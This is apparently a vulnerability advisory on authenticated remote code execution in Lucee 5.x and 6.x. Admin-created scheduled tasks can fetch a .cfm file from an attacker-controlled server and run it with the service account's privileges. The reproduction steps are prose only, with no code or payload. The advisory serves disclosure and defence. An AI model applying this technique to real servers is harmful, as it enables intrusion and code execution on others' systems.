Lucee Remote Code Execution Vulnerability in Admin Interface via Scheduled Tasks

A remote code execution vulnerability has been identified in Lucee's administrative interface, affecting both Lucee 5.x and 6.x. This vulnerability arises from an insecure design in the scheduled task functionality, which allows an authenticated administrator to create a job that retrieves a remote .cfm file from an attacker-controlled server. The file is then executed with the privileges of the Lucee service account. The vulnerability exists because Lucee does not implement integrity checks, path restrictions, or execution controls for scheduled task fetches, enabling the execution of arbitrary code.

Impact

Exploitation of this vulnerability allows for authenticated remote code execution on the Lucee server, with the executed code running under the user account specified during Lucee installation. On Windows, this is a service account, while on Linux, it is typically the root user or the 'lucee' user.

Reproduction

To reproduce this vulnerability, an authenticated administrator must access the Lucee admin interface at '/lucee/admin/web.cfm'. From there, a scheduled job can be created that fetches a .cfm file from a remote server controlled by the attacker. Once the file is retrieved, it will be executed on the server, leading to code execution with the privileges of the Lucee service account.